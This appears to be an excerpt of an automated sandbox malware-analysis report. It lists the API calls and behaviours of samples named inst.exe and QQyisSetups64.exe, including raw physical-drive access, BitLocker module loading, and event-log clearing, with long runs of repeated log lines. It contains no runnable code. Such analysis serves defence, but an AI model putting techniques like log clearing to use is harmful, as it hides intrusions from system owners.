Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d	15_2_00AF2210
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d	15_2_00AF25D0
Source: C:\Users\user\Downloads\inst.exe	Code function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_00A766F0
Source: C:\Users\user\Downloads\inst.exe	Code function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_00AF2760
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_00A76759
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_00A868A0
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d	15_2_00A86AE0
Source: C:\Users\user\Downloads\inst.exe	Code function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_6C5D42E0
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_6C5D4349
Source: C:\Users\user\Downloads\inst.exe	Code function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d	16_2_00AE2158
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d	16_2_00AF2210
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d	16_2_00AF25D0
Source: C:\Users\user\Downloads\inst.exe	Code function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	16_2_00A766F0
Source: C:\Users\user\Downloads\inst.exe	Code function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	16_2_00AF2760
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	16_2_00A76759
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	16_2_00A868A0
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d	16_2_00A86AE0
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d	16_2_00AE18BD
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d	16_2_00AE1A51
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d	16_2_00AE1BEB

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AA5C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos,	15_2_00AA5C31
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00ACA4F6 __EH_prolog3,IsIconic,ShowWindow,	15_2_00ACA4F6
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AA6727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop,	15_2_00AA6727
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C618D76 __EH_prolog3,IsWindow,IsIconic,SelectClipRgn,OffsetClipRgn,GdipDeleteGraphics,SelectClipRgn,DeleteObject,	15_2_6C618D76
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AA6727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop,	16_2_00AA6727
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AA5C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos,	16_2_00AA5C31

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_0378B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,

6_2_0378B3C0

Source: C:\Users\user\Downloads\inst.exe

Code function: 15_2_00A95706 __EH_prolog3,_memset,GetWindowsDirectoryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

15_2_00A95706

Source: C:\Users\user\Downloads\inst.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\LiveUpdate360

Jump to behavior

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Key value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4

Jump to behavior

Source: C:\Users\user\Desktop\QQyisSetups64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
